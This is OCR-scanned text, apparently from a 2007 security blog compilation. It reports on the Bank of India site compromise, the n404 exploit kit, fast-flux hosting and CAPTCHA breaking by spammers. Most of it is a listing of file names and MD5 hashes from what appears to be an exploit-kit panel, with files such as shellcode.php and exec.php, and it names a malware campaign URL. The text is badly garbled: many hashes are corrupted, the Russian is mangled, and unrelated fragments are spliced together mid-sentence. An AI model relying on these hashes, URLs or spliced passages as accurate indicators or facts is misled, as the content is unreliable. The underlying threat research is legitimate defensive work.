bc76c6ba430d1d00a6a951b04e32b7c6 
geom.png 2a896f08ec466580130a881c11b51509 
grid48x48.png 
9c62f32e93e2e280fb4f5f5b831bc193 
grid48x48m.png 
3b4b0f56e68f1dff5875b5ba63bc8745 
hatch.gif 
d4ab261f351d984e583f6298d1689d6d 
hd-bg.gif 
8009002d5ae2b48d5148572dde4d3545 
hd-tb-bg.gif 
4cba9d5f4830e9a8dal1819b67fla724a 
i.png 
6c02bc3e7d3b63a0bfb6052004b6389e 
icons-bg.png 
8109fe6a35207d8bb2b102eecae59ca7 
index.html 
81e1d982bf67bb23723cdfcalda72650 
ip.png 
37bc5db6723543e26ae8072962ce7c13 
ipm.png 
€835a3c89ffod29f8c2dabb6f7390620 
launcher-bg.gif 
17113b03674cf859c9da3c8d4c3677e3 
launcher-btn.gif 
3afec495c868cf95db39b9a4ae4b3040 
logo.png 4f3052ff22567336fd06a02e17182da3 
logout.gif 
dd93348fad4cafde9ced4c8c8951cbea 
logout.png 
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25447272743b68184436a2495b022b99 
0.png 
0057a98a513f0b92e328059e6f7e299e 
ref.png 
e7c694a808b2699ea37b5ad2c140d03c 
refm.png elb8a7582bbe5b511daceebe54f5966d 
s.gif 
fc94fbO0c3ed8a8f909dbc7630a0987 ff 
sbr.gif 
9061f389f855bf6ébefff5831dad5b73a 
sys.png 
26ae6641fe6f7c71b91laeO0cac1bb3669 
sysm.png 16elclbc4fé6ff4f19c9c438ad40ca079 
winbar-bg.gif 
e9e7a6150d8113d950f9869bff7 8540f 
winbar-btn.gif 
94f07f13833115696alcacOc48d9eebd 
windows-bg.gif 
b707d9de918913e8bbaa74e2e7bb2473 
gradient-bg. gif 
e117fca9d088e4cd5bbbcec7b99a8408 
s.gif 
fc94fbO0c3ed8a8f909dbc7630a0987 ff 
shadow-c.png 
7ab6163237099f2529452b88953a4049 
shadow-c.psd 
5a9779b9648109ac3efe80d1d9415234 
shadow-Ir.png 
986270d8ab4330fa7499dc33ed135598 
shadow.png 
860bf4f690d2ea2aba7b11500925dab62 
corners-blue.gif 
86fd4c5664e0971bfc11959e8442604c 
corners.gif 
d2d1bc2085b369ce35ffd20c0121676e 
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AntiVir 2007.08.31 HTML/Crypted.Gen 


eSafe 2007.08.29 JS.Agent.ke 
Fortinet 2007.08.31 HTML/Heuri.BIU!tr.didr 


F-Secure 2007.08.31 Trojan-Downloader.JS.Agent.no 
Kaspersky 2007.08.31 Trojan-Downloader.JS.Agent.no 


Webwasher-Gateway 2007.08.31 Script.Crypted.Gen 


A great example of [7]a fast-flux network with way too many infected hosts participating in 
the attack, and despite that some seems to be down, the attack is still fully operational in a 
typical fast-flux style. 


UPDATE: [8]F-Secure’s and [9]McAfee’s comments on the case, as well as two related posts - 
[10]Bank of India’s Website has been Compromised by Trojan downloader; [11]Bank of India 
Official Web Site Unsafe at the Moment. 


UPDATE 2: Several hours after the Bank of India got rid of the iframe at its homepage, the main 
URL for this malware campaign (81.95.144.148/in.cgi?10) removed the javascript obfuscation 
and is now forwarding to Google.com. 


[12]Bank of India’s post-breach statement : 


"We have taken up the matter with our technology-partner and all necessary action will be 
taken to rectify the matter. In my view, the users will not be faced with any major problems,” 
said Bol general manager PA Kalyansundar. “However, we are not completely sure that 
an attack actually happened,” he clarified." 


Here’s another article from [13]The Register mentioning the three key points related to the 
Campaign - the Russian Business Network, the n404 exploit kit which is definitely a [14]modifi- 
cation of the [15]popular ones [16]currently in the wild, and the use of [17]fast-flux networks. 
And this is [18]what happened when an Indian tried to reach the local Cybercrime uni[19]t. 


Related links: 


[20]Video of the attack 
[21]Graph of the n404 exploit kit 


1. http: //blogs.zdnet.com/security/?p=487 


2. http: //www.webpronews .com/topnews/2007/08/30/bank- of -india-site-co-opted-by-malware 


3. http: //sunbeltblog. blogspot .com/2007/08/breaking-bank-of-india-seriously.htm 


4. http: //explabs. blogspot . com/2007/08/compromised-bank-website.htm 
5. http: //blog.trendmicro.com/the-404-stor 


6. http://blog.trendmicro. com/more-russian-uprising3a-new- iframes-and-n404-web-threat-kit/ 


7. http: //www.honeynet.org/papers/ff/index.htm 
8. http: //www.f-secure.com/weblog/archives/archive-082007 .htm1#0000126 
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l-blue.gif 

ced9ffbf66ea39e7 7083a591f8257267 
l.gif 
c4d9dbbdc59ae06b5e9e72a6a865c981 
r-blue.gif 
82dbb522a80e3246f6297719371a9494 
r.gif 
bfle1d4a45f951ae656968a8c834f04a 
tb-blue. gif 
7c4b19eb682afdclbde0640d2321fb25 
tb.gif 
dd3f63afe7ba90983ba73dad1c66bf2f 
btn-arrow.gif 
9e2365ef98c6096f6b5f411ab618bb4e 
btn-sprite. gif 
47cd75b517cc956b9fdca302al2ba9f2 
drop-add.gif 
95eb34ac70ala3c95ef39ab826a89491 
drop-no.gif 
ae536c37391ba78143b5c8283cec8d13 
drop-yes.gif 
f3216326c00890259e84f1726dd1043f 
tb-sprite.gif 
a2f06caddc2fb729db5cbbd874491128 
checkbox. gif 
75d685cab5665a935660a3d04f71c2be 
clear-trigger.gif 
97b3e5e9edf27b50d63d48098c2fleae 
clear-trigger.psd 
€8c2d843458728df5c184a54862c5946 
date-trigger.gif 
30b5bace9f3dac358716c1415270f874 
date-trigger.psd 
3f10ecf0d961006507d043f9b9fce45e 


error-tip-corners. gif 
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364474276178c7b48b6270056b42b808 
exclamation. gif 
37dbe02e3cbde0f6780650bfd8535e38 
radio.gif 
0239bdaef529be68530b86266a24742c 
search-trigger.gif 
559ef372cf27a38678d84e8c0b7237fc 
search-trigger.psd 
daacfb6d450b8cd56da5905db4c8b8c0 
text-bg.gif 
d5ba54c1f417e6a72cbce8b909078727 
trigger-tpl.gif 
d7be20f0dc38f4f46cd318fe32cf3ce3 
trigger.gif 
45019efdf75528242c5a68742821dc57 
trigger.psd 
18c377883d16e6146566f084f8b205cc 
arrow-left-white.gif 
b04e859bdcbd21ad1f06b8bfa7881df8 
arrow-right-white.gif 
714eb00f8134dde3a65c83f3f71ad2c4 
col-move-bottom.gif 
9c38bcb5ceeldc9b4ce64ad9ab1386f8 
col-move-top.gif 
€4584202d5172464050f675d396d1c6f 
columns.gif 
ef35242fa6514a81d17d5f700f561b7c 
dirty.gif 
decca3b96e2c37cfoeb04ddb0d9f669b 
done.gif 365266930a93451414fe51ffc524a196 
drop-no.gif 
b53ca86d60fbcc7a45c8917299218bfd 
drop-yes.gif 
af96f4c3b32a470db2f38abb521b5c97 
footer-bg.gif 
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65ed63e44c6149f1127ad3b4be4e0108 
grid-blue-hd.gif 
dd35d5c1202c440c2d1a945b335984d3 
grid-blue-split.gif 
0494ba49974ff2bc1bf81leld82dfee18 
grid-hrow.gif 
55972a5063d80f35fb6b95a79bb0018a 
grid-loading.gif 
9ac6f737eb9b15272f12b00bfeb3c3c6 
grid-split. gif 
3ef419d4b9421d8e94f673a6238dc4c0 
grid-vista-hd.gif 
675f403e8a9cb5ab4bed725da9fe2023 
grid3-hd-btn.gif 
e3e77072c16a6b27556236961f29c552 
grid3-hrow-over.gif 
a92d8f6c106943995720f2884634670e 
grid3-hrow.gif 
3e4484ea8db10af1320808c8477346ea 
grid3-special-col-bg.gif 
c9df03a1c107360128da89fa47066405 
grid3-special-col-sel-bg.gif 
a94039f89dec164896ceffifbdf6dbc5 
group-by.gif 
3ff8c5936e358cf213227509c9bee95a 
group-expand-sprite.gif 
d0f614a387292177f3acb0c95a4cd760 
hd-pop.gif 
e5f27a2f68cc2d13b11cf41c46d298dc 
hmenu-asc.gif 
048e0bc30f7c39d473dad5dabcbe03f2 
hmenu-desc.gif 
f0a987b34b003b25a7c82624d41f018a 
hmenu-lock.gif 
bcef18e25342c69c37c44dab87086065 
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hmenu-lock.png 
2a3b0b441834f443c1086930939efdae 
hmenu-unlock.gif 
8cc8205dafa587ef02d8a86903ae8074 
hmenu-unlock.png 
clf6l1df70b98c5498ea81le7e7b9effbb 
invalid _line.gif 
04a88e97b56e8a8ece4a66d49cc78828 
loading.gif 
00ef871b291bc03a497d608a5bd8ec99 
mso-hd.gif 
37fba9cO02f0eefe57f655890eef1c4al 
nowait.gif 
23c91166dbb16ba8655363321bf5a400 
page-first-disabled.gif 
8d3185028c541cbcce67b5909c04824e 
page-first. gif 

16ecO00fa7 70d860b768cf5034ddfca96 
page-last-disabled.gif 
1d123237ceeb5109a1b9274f0cf19d73 
page-last.gif 
ef524dd0b8dfe4eefecffaalcObb8edd 
page-next-disabled.gif 
0f4b8681772c91921fa93ede9c755ea0 
page-next.gif 
f6f9d2209dfc99912ffc9848d97646db 
page-prev-disabled. gif 
eefcbed15c8d37a89618b08f7b224297 
page-prev.gif 
80daad880483eed682b22ec70514ecc4 
pick-button.gif 
b431fdf306fle2f033d0a431996de93f 
refresh.gif 
fla2e7df30394c5a30bc76c2d09013b7 
row-check-sprite.gif 
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2d0aa7e501c3e6f97a97faf75e35d3c3 
row-expand-sprite.gif 
be81199d9d4fa69bef47a8f036a5a7d8 
row-over.gif 
f639094bd0560aefabc86e51a825f23d 
row-sel. gif 
ca87d6b950386edd5e17c985769d9101 
sort _asc.gif 
2352874b5f636ca331fe9509a2f9bdd7 
sort _desc.gif 
d104fcf119d40c51554ddb8b377142e5 


wait.gif bOcd5a5dc070c705ebf8814a909802c3 


collapse. gif 
dfcec0803d488a783916c750fd83a897 
expand.gif 
c9c9b0ea5311c3dc016c69dc234912bc 
gradient-bg.gif 
e117fca9d088e4cd5bbbcec7b99a8408 
mini-bottom. gif 
ae8e3674fd32997dc5217d5d6199a5a5 
mini-left. gif 
8654fdb45ecf4406af2fceld3beb7596 
mini-right.gif 
cbdf9fb0c45466b4217ac9f7bd6a9ed4 
mini-top. gif 

fod91e9857 6f66fd2702495251b15240 
ns-collapse. gif 
efa9fbd7alf3f0f1f22360391e16126f 
ns-expand.gif 
dal1f9d40c091d3b6dc7a8dee4fcO2ac6 
panel-close.gif 
b185da1837344529bfb684a96d8371b5 
panel-title-bg.gif 
b66384c309a397963389a76b07e9ecd4 
panel-title-light-bg.gif 
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688d3a263442db125dal170e5d3aebf70 
stick.gif 
be9e67ae0b61b01cfd15928ca7a3da51 
stuck. gif 
745e0cacb51250ea0216efc4alcb50cb 
tab-close-on.gif 
0ae2c978e85391a69f0dce8dal8d8b23 
tab-close.gif 
f92107cc6b4cb78af084648a628e01d2 
checked. gif 
cb7b3408df56f5585aaal242cd2f0b45 
group-checked. gif 
£7973443d91e5e074013f1b07ee79479 
item-over.gif 
bb4cdc0ea257834cd5ed01f883387d8f 
menu-parent.gif 
d303ad7e3ced891736e80f77e1ld4e51d 
menu.gif ael28d5f3f3a39213f3d4e23aec8728f 
unchecked. gif 
31846118bddc7945b595ea2090589cf1 
corners-sprite. gif 
d4546c86ed835fee767212279ee98b68 
left-right. gif 
6553647bad54d83e2c235f339d12f6be 
light-hd.gif 
b058affcc8b3e8a03be74bc9d9697da7 
tool-sprite-tpl.gif 
e0449768cd5dce80b18fac904818ab33 
tool-sprites. gif 
d392b0380fce8849d44e212ae1fd333d 
tools-sprites-trans. gif 
545c53f0e1439e9441a0b41df848246a 
top-bottom.gif 
a4854e1b3aea60123522cb687a462c05 
top-bottom.png 
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2a65a27def756a0951644b511f6f2cce 
white-corners-sprite.gif 
81f089d0247calad12093be21884d773 
white-left-right.gif 
77a6389c6737ad507ca5330ad8816524 
white-top-bottom.gif 
f865d7237bff3c45fd4a8c448f97d236 
progress-bg. gif 
fd75abcd9d1cb8534f24f438a71e6fd8 
bg.gif 
49c0a530cc16357bb39d51c13065a88f 
close.gif 
0379d036250096cae2e42b427b3df2e7 
tip-sprite. gif 
090b2d83952e682fab43b2ab16be2991 
blue-loading. gif 
dc2fd7c0ed853c56b4ac65710af3bd0a 
calendar.gif 
81296cff1f97f5365524f2b9dcf626da 
glass-bg.gif 
bc2cd5c5ac9b3874d956c892d23f2119 
hd-sprite.gif 
6a54ae98bef53397d52282201852c204 
large-loading.gif 
d96f6517e00399c37a9765e045eaaf22 
left-btn.gif 
6bf30c6cf0b5d70436c3e463b5532b35 
loading-balls.gif 
ac062b94ed674aaa50a6c18df92acdf3 
right-btn.gif 
e7ad3a7f4814791cecflb90e77e9e139 
warning. gif 
448dc934a7f0dd6092b51f88al1le47b2d 
e-handle-dark.gif 
b86289f41d7ad1a7401dd2b2a9b3c3d8 
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e-handle.gif 
510edc95ebaa36306916c50cal0596f7 
ne-handle-dark.gif 
115f71b851c7f0b5f354caa7b8dfff15 
ne-handle.gif 
8e268b962dc909d275997b572ff17a72 
nw-handle-dark.gif 
4a361e6920b2e34a39fd425a515c83b9 
nw-handle.gif 
1120600505249c38c3d1cc2ab120cd13 
s-handle-dark.gif 
4a6bf15d308a4ae580dd03cbd431a95c 
s-handle.gif 
5e3338cb09e9df7f52383d6b1423fc86 
se-handle-dark.gif 
f3d8d8aac23e3e9633072e2366cda847 
se-handle.gif 
71edc3f63f79f447d2c81ee09elfbbc3 
square. gif 
4431ea1954bfd2a9cea0931f07fc7ffa 
sw-handle-dark.gif 
44b2400d873cf8a23d84424827cde44d 
sw-handle.gif 
c3e0befc4208a51180344765fd7deeda 
slider-bg.png 
0903ad3af985419767a60a5b025e0a18 
slider-thumb.png 
24a893c9606f3a6892eb62f29a08870c 
slider-v-bg.png 
0682c28925a7296730f7f221e4a76b96 
Slider-v-thumb.png 
2fc3430dc351d9a118e048b9aafb7c3c 
scroll-left.gif 
f1ce5158650880e9fe256e739f60dd23 
scroll-right. gif 

10280 


905ea778cb64c74ef3cd49ae4fab64b71 
scroller-bg.gif 
43457068d919fadd0e959542cfd81lad2 
tab-btm-inactive-left-bg. gif 
ed19092d440c5bfbdc864f714f26ee03 
tab-btm-inactive-right-bg. gif 
c3f340dc9f7f9398e1395f351e706dfd 
tab-btm-left-bg. gif 
dfe63a170d5391d56645dbfed27b5d22 
tab-btm-right-bg. gif 
768ac4e5531974feda076cbca7a5cb6e 
tab-close.gif 

59304a56f5e0f506bf67 laeafb8fc767 
tab-strip-bg.gif 
5b1b94e9669aaab4e76e5aba8bf8ecld 
tab-strip-bg.png 
d99e3b7b2610f3c85aa943fel39eb6afa 
tab-strip-btm-bg.gif 
f76eec7881fcc7a0f76354d184e0087e 
tabs-sprite.gif 
2562a17ad0076bdd3711d18e62f74c27 
bg.gif 
b795052041aa76a42466b3be5575077f 
btn-arrow-light.gif 
fa49b39a0fd88ef26264da44a2b4edea 
btn-arrow.gif 
12bda29a4c8016cfa047e852c4353f59 
btn-over-bg. gif 
faddf9b24cefa721326ba3f87f3ef31f 
gray-bg.gif 
cf2d9408f320e696e607d8472afa7ffO 
tb-bg.gif 
5309337fd7a22cab9d9467fd9eaa0a0c 
tb-btn-sprite.gif 
ba0a5d77db72942782fc4bf23f710738 
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arrows. gif 
led43ea06dfbba89c06f6cb6fc372ace0 
drop-add.gif 
95eb34ac70ala3c95ef39ab826a89491 
drop-between.gif 
edb544a0de58547d4a39c526e06e3c82 
drop-no.gif 
67f83ea04a2eb1c50614a96faf625f25 
drop-over.gif 
d6b303cfa3de8784057d9d7e66cdaa86 
drop-under.gif 
55e5dbc9451cfa91423832260b0753aa 
drop-yes.gif 
f3216326c00890259e84f1726dd1043f 
elbow-end-minus-nl.gif 
5e5bffba157eceee7989db95b919e4d5 
elbow-end-minus.gif 
a469f6a4394d797c2efeffc70409f6db 
elbow-end-plus-nl.gif 
fOf50cOdd3ee6dd4b11c1f245b36eb01 
elbow-end-plus. gif 
e€c1482391363612d9e5f8c7087fddaba 
elbow-end.gif 
345551384aa325189ba28a1c20f3405e 
elbow-line.gif 
90e478158df476dc989ab60daaafc87e6 
elbow-minus-nl.gif 
5e5bffba157eceee7989db95b919e4d5 
elbow-minus.gif 
71bb1bd44b1274c60d30dbalde472ed7 
elbow-plus-nl.gif 
fOf50cOdd3ee6dd4b11c1f245b36eb01 
elbow-plus. gif 
945572d06a74b5f952251a86c595f2da 
elbow.gif 
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9. http: //www.avertlabs.com/research/blog/index. php/2007/08/31/compromised-bank- of-india-website/ 
10. http://www.techshout .com/internet/2007/31/bank-of-indias-website-has-been-compromised-by-trojan-downloa 
11. http://www. labnol. org/india/interesting/bank-of-india-official-website-is-unsafe-at-the-moment/1287/ 
12. http://economictimes.indiatimes.com/News/News_By_Industry/Banking Finance_/Hackers_play_hide_and_seek_wit 
13. http://www.theregister.co.uk/2007/09/01/bank_of_india_website_takeover/ 

ttp://ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


. http://ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action.htm 


16. http://ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 
17. http://www.honeynet .org/papers/ff/fast-flux.htm 


ttp://convergence. in/blog/2007/08/31/bank- of -india-attack-arrogant-cybercrime-police-and-web-host/ 


ttp://convergence. in/blog/2007/08/31/bank- of -india-attack-arrogant-cybercrime-police-and-web-host/ 


20. http://wormradar.com/boi.wm 
1. http://extracare.trendmicro-europe.com/tm/core/global/images/diary/415de6c43168c331e0007b5c52b6a412_n404. 


3.9 September 


3.9.1 Spammers and Phishers Breaking CAPTCHAs (2007-09-03 12:25) 


Start testirg 219.65, :1080..., [Done] 
Start testirg 66.61. "7312 ,., [Failed] 
Start testirg 124,125, :1080..., [Done] 
Kanna SSuiMTHEI Koa PesyneTatT 


EMH 1589113339 |Unkown error 


mH 927270276 


867830514 Unkown error 


: [ 
’ so0sess7s |\Oum6xa: IP 124.125. 11080 saGnoKupoesH ana permcrpaunn 


The emergence of CAPTCHA based authentication was a logical move in the fight against 
automated brute forcing of login details, registrations, spamming and sploging in the form 
of comments and splogs registration. And consequently, spammers, phishers and malware 
authors started figuring out how to automatically achieve their objectives, by either breaking 
or adapting to a certain CAPTCHA, and even more pragmatic - outsourcing the request to a 
third-party. 


Two months ago, there were news stories on how spammers and phishers feeling the pressure 
put on them by 
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27679f3b1222ba95d9925885d7d82d02 
fold.png 3b4b0f56e68f1dff5875b5ba63bc8745 
fopen.png 
3b4b0f56e68f1dff5875b5ba63bc8745 
leaf.gif 23757d6e353f343e3c7edfe28428f198 
loading. gif 
00ef871b291bc03a497d608a5bd8ec99 
s.gif 
fc94fb0c3ed8a8f909dbc7630a0987 ff 
icon-error.gif 
f477b54b6b8361362e96c2218dce7ea0 
icon-info. gif 
ec6b7a5d4caeea767c8674689bae47c6 
icon-question. gif 
2713644a8aa582728d71e35eca62fbcd 
icon-warning.gif 
3f20258272af0e00f6b7531b3b9aee35 
left-corners.png 
b31le6f0de60a5f9ddab629c7d65a0428 
left-corners.psd 
18618115985e5905c7a6345c3ef0255a 
left-right.png 
8d9c2e368794c8b6fcb586a539cd9f93 
left-right.psd 
067af0372316223cdce198090f6291f5 
right-corners.png 
3262c5858058568e11f8c48f2a966411 
right-corners.psd 
5laea4dd6bbdedf7923342e43bacbb7a 
top-bottom.png 
1f34e15ebd2c9dccea30904ed947db21 
top-bottom.psd 
1b49227fe6af3487971851ccd5fbab3e 
gradient-bg.gif 
e117fca9d088e4cd5bbbcec7b99a8408 
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s.gif 
fc94fbO0c3ed8a8f909dbc7630a0987 ff 
btn-arrow.gif 
9e2365ef98c6096f6b5f411ab618bb4e 
btn-sprite.gif 
a92a0fc7792f1be35b6497a73e4d8289 
corners-sprite. gif 
154047c3b38abc110a43c348ea693Cc77 
left-right. gif 
1050c80869b13c1bcca6319b048eala5 
light-hd.gif 
30be5fa3a5bc389f4de260e91ff24f5b 
tool-sprite-tpl.gif 
4b1322b5966a588abb0829b27818f738 
tool-sprites. gif 
2f408e54b7eff4f7d95a5271cb77d58b 
tools-sprites-trans. gif 
545c53f0e1439e9441a0b41df848246a 
top-bottom.gif 
2cc75c4c076232ba842d63778e20aaf6 
top-bottom.png 
2a65a27def756a0951644b511f6f2cce 
white-corners-sprite. gif 
c22ed792c859ce8dcdfd52f6d6b15e3f 
white-left-right. gif 
52d662a46dc90b5043765f2d6d0clacd 
white-top-bottom.gif 
92b14692938ad89c687a55bd11a13d35 
bg. gif 
63f297dd8fa77f097616d840e9ad0e70 
close.gif 
0379d036250096cae2e42b427b3df2e7 
tip-sprite.gif 
ad15b7424407d3045ced4616244e6500 
scroll-left.gif 
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2e262700bde38fla5e0b433bff392e5d 
scroll-right.gif 
1333d896f57dfdcc8b73b4a391af8c65 
scroller-bg.gif 
85fc3011aa8416fc9f6cd6cdfeesff54 
tab-btm-inactive-left-bg. gif 
79692d0d06efdfee4352eb2313fc405f 
tab-btm-inactive-right-bg. gif 
2f38f98c02e576e7c07abab79b635599 
tab-btm-left-bg. gif 
904bd37fe0eac4fd2e42adc3693eeed3 
tab-btm-right-bg. gif 
174345d57983dcf5d38ed7717b3a17b3 
tab-close.gif 
9ed7d602bee0483b8aa34d2084c77754 
tab-strip-bg.gif 
5b8f86def656924e8d4e49e438a205al 
tab-strip-bg.png 
d99e3b7b2610f3c85aa943fel39eb6afa 
tab-strip-btm-bg. gif 
8e5594b6e95ef5edd30b3a2d0bb1f3cd 
tabs-sprite.gif 
4dc716e5213e4d9d2731d0e79953ea2f 
bg.gif 
5c8ff0ea2f6e1226154f660006bb5013 
btn-arrow-light.gif 
fa49b39a0fd88ef26264da44a2b4edea 
btn-arrow. gif 
12bda29a4c8016cfa047e852c4353f59 
btn-over-bg.gif 
faddf9b24cefa721326ba3f87f3ef31f 
gray-bg.gif 
cf2d9408f320e696e607d8472afa7ffO 
tb-bg.gif 
5309337fd7a22cab9d9467fd9eaa0a0c 
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tb-btn-sprite.gif 
7¢7d5c1029d25748b9323a67dd8dc92f 
icon-error.gif 
f477b54b6b8361362e96c2218dce7ea0 
icon-info.gif 
ec6b7a5d4caeea767c8674689bae47c6 
icon-question.gif 
2713644a8aa582728d71e35eca62fbcd 
icon-warning. gif 
3f20258272af0e00f6b7531b3b9aee35 
left-corners.png 
f5cccec900e527983d402d1a8cccecb3 
left-corners.pspimage 
cbd1e105535264872643345cd53df57c 
left-right.png 
2bc0b5bcc87f58d7825754a457f8d671 
right-corners.png 
d0c47fa4e6flecdbe8aed7444c8724ca 
top-bottom.png 
22bb60d1a515987e330b169d2d85290f 
item-over.gif 
alcf748839dc751c46e432174d49934d 
scroll-left.gif 
cea7198b278f4a3b10bf3296973519ad 
scroll-right. gif 
b3dd893a27617e38c4757c2387cd73e2 
start-menu-left-corners.png 
9be0b6adbc30502c4b68d9ed0f035aa6 
start-menu-left-right.png 
17da8055199e15a5d883845a65747685 
start-menu-right-corners.png 
e44bb8da83b76ed841b538565686d3b8 
start-menu-right.png 
617cO0e5c80cec71fblb75c4dele4157a 
start-menu-top-bottom.png 
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bad589767678c242826014406cd9468c 
startbutton-icon.gif 
9e54968d44c9afbec19667fe6809bf32 
startbutton.gif 
e3f266b4f33e9f9a69218be159a9d278 
taskbar-split-h.gif 
68f56575a4837f57d4d5b3a9a21fa459 
taskbar-start-panel-bg.gif 
e€352028aadc1597378eb3cc39c17537d 
taskbutton.gif 
58f32a6a53b4d2al1fc1d0395bd77005d 
taskbuttons-panel-bg.gif 
ba3a5e2113747924679c1e6161el1fd32 
gradient-bg.gif 
e117fca9d088e4cd5bbbcec7b99a8408 
s.gif 
fc94fb0c3ed8a8f909dbc7630a0987 ff 
bg-center.gif 
dc9ald9abffcf9b42b2af612e004ca5d 
bg-left.gif 
d69d9462c55425f0f8b507a9ec7ef87c 
bg-right.gif 
05b131a5a10551fef073d12d60f3dc7a 
close.gif 
166e5949d0615d534268aaeba8s5d5ff3 
collapse. gif 
4fc52d2d88c5393bfcb0513facc08101 
dig-bg.gif 
ac0c1bd9128228c707a4a80c2904ed2c 
e-handle.gif 
9ac6163eb5583935534676466db1e4e6 
expand.gif 
8e418f4ff36d3b9918d0fb256e7eba47 
hd-sprite.gif 
9d63433a57925fdba1005a278e8df440 
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s-handle.gif 
8d2d596c8f47417dcd639400fa2be4f7 
se-handle.gif 
41c366e9283e88a4ad1bf31c57705831 
w-handle.gif 
01aee195b2d22f255b0173602a9199c2 
grid-split.gif 
3ef419d4b9421d8e94f673a6238dc4c0 
grid-vista-hd.gif 
675f403e8a9cb5ab4bed725da9fe2023 
collapse. gif 
0ec68390e14177417a3d06acaa50c9c5 
expand.gif 
d6ébb1e63b63bdec7bd0a0d18b07 2a4ff 
gradient-bg. gif 
15e8fbee273759e773640cd0b6120b0d 
ns-collapse.gif 
d9f39cd8577704700fbc43a208c0060d 
ns-expand.gif 
824e048aa0c0d9aec7468ab70ac38d2d 
panel-close.gif 
ed4cb31e88a4b329dcc626153c5afaf7 
panel-title-bg.gif 
e38eceff2c03e4497070720383e8bbac 
panel-title-light-bg. gif 
a150228667dc1c73d413e4a8636be3ad 
stick.gif 
dd56f6fac163a6ca5d649f2aba41b9dc 
tab-close-on.gif 
99f2022567c0c46ec1cda49781b48b0f 
tab-close.gif 
24606f80769a29cd34faaf5baa92cc64 
bg. gif 
09bc08c8c18b82029cflb8df3d57976a 
tip-sprite.gif 
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947a33e8f851d4d5f3b2b4bc33055f8c 
e-handle-dark.gif 
1f1c7d1dfb1b0fbb1la42ab9df1b830c7 
e-handle.gif 
920872e382be4fca73604ee71c4e5fd6 
ne-handle-dark.gif 
2e7d7cbba5678b50e0dd91240892214a 
ne-handle.gif 
O0c768f0f893c4e6ff7642af3f2d34945 
nw-handle-dark.gif 
1bcc898557117f206936e19c7cf86241 
nw-handle.gif 
1236d11a3ff21e0879547922249ba832 
s-handle-dark.gif 
1a2a1311lef7fb20bb0de09f2e8b83dbc 
s-handle.gif 
b2159eeed4b26a8bee5aec9a05dc73b2 
se-handle-dark.gif 
83ea781d13ac7f4a4084f74e9658ab6d 
se-handle.gif 
a52ffe91b3f48693fd27f13a8d4aa330 
sw-handle-dark.gif 
b87bc36f8a55f0b5 7 4a6fea3a4fa0004 
sw-handle.gif 
bd8b1042c698c564522773116f07d84e 
tab-btm-inactive-left-bg. gif 
84f7162ddd3dc5b5e45b29a01a3234f7 
tab-btm-inactive-right-bg. gif 
c3dc089bd1fb9d4b5423de8a2ef6a491 
tab-btm-left-bg. gif 
2fc42a68fe461e7448fce967d46b22dd 
tab-btm-right-bg. gif 
2c0e61379d0afb08b5900689a4c50b99 
tab-sprite.gif 
9b102c3b3549f5c28cc8d8007ebe1b16 
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gray-bg.gif 
01d172ee2d93dbc30ab1ca32004498fb 
tb-btn-sprite.gif 
be68537cac19494f1fdb0309655a35el1 
App.js 
b6e5ebd945a28f05cb76262bc12d038c 
Desktop.js 
78e72852ed58a376d145ddd921c7b989 
examples.js 
be739e84662ec8163f17af87e026a20a 
ext-all.js 
40e20223bd5c8672bc5f3ddcbd2df5b6 
ext-base.js 
3e722496085adac4d3abaee12857a34a 
gmap.js 
4513434738319a0b2597449432bd2b3a 
index.html 
81e1d982bf67bb23723cdfcalda72650 
map.js 
0d07542441124111ca48bb807686e648 
Module.js 
a4042084b7646f978695195e634ecba0 
StartMenu.js 
5b37fd167ce140e268863e81d1e08abc 
TaskBar.js 
c45d27d606b6c407bd41362b0d04a0f9 
brow.js 
b09c0aae7e0b5747841eac29de1213b3 
brow.php 4aac631793356de5ee7de5bf66ee0765 
count.php 
b488c521620b90320cfa9eee359c860b 
fc.php 
57ac50d7clefa28f7a0c812bed640fbf 
handler.php 
bdfd2f7f154776a004f6a5602b6447 bf 
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index.html 
81e1d982bf67bb23723cdfcalda72650 
info.php 2ffa0a531245727aee61d6b38d0326e3 


module.php 
98b17772aca4d20edc43d4ce735bec50 
op.js 
63453e6638f5b24dae49c1aa267fa4ef 
opt.php 
4fac713fcc5628c88c909efd3ad3b611 
query.php 
161406255d4e30deab0a276c35d8eac2 
SIc.jS 
d4c4f34d43c8abbbb5ee98c91b23f1le4 
vend.js 


a9e29e2002f5a606F4562dc69622ed42 
vend.php a0e60b73d0784ac3bd0ccc593979c137 
desktop.jpg 
8be530bc7b991e9745c6f76bc10ec804 
desktop2.jpg 
b34f5205b34flccal345f230c2f9114d 
index.html 
81e1d982bf67bb23723cdfcalda72650 
shiny.gif 
b6155812698793cfcf6ldcf5908562bf 
index.html 

HostTest.png 
994507cb6690c0e3bcd5ce5ff76293f6 
index.html 

index.html 

index.html 

log.dat 
b5a2a76c049420bc8963a7536dd4fdb4 
403.php 
5c79328e9473e06d5cedf651b2354618 
404.php 
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4c3c585b39685a145be190f82dead6bc 

bg.bmp 

34783e627f91b83ebddf13f2f49b3c22 
close.omp 
86ab02453c8d16ec7941904bab4face5 
geoip.dat 
3e343d2cb978eb14b5e419e602229cbb 
geoip.inc 
d37a83b87a8f42326eafedf724d25857 
icon.omp dic701dce9326c7d6df4a5ea52cd6074 
index.html 
81e1d982bf67bb23723cdfcalda72650 

spl.php 

€27d971f6e31b485711352ecdf20f48e 
vars.php cbof71e3595e2d2867790f478d9320afe 
404.php 

40add8892d6f515f8e3ba2b40f93973e 
config.php 
d52380f9f868bda71a58f15cc5350a71 
exec.php f518a84028023b11fal7bd24b37647a6 
functions.php 
569acac3e9fab5b6593f42c13b42678a 
index.php 
730ad9ea85a9f838343a62bb2614d8db 
install.php 
3e832f7d1383c5ea77ec3f03da254c59 

libtiff. php 
b7e55723833ab0d5ab525f1568flcfea 

load.php Od2f9e586e94a0d5abfc5d8b8fd19122 
old _pdf.php 
3caace362028ed4be919356e2ffbabee 
shellcode.php 
bd9c16536d00a6904901f3a0a4efaa32 
index.php 
66e310ab1bce3105bc23656fc6ab5ea8 
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Kon-Bo aKKoB: 


Beepyre cnncok npokcn-cepBepos: 


anti spam vendors, have supposedly [1]broken Hotmail and Yahoo’s CAPTCHA. Nothing is im- 
possible, the impossible just takes a little longer, what’s important is discussing the many other 
perspectives related to adapting to a CAPTCHA, directly breaking it, or entirely ignoring it. 


Banyck NPOeBepKH cnucKa NpoKcH-cepEeepoelOTKNWYHTE MO%KHO & daline config.php)... 


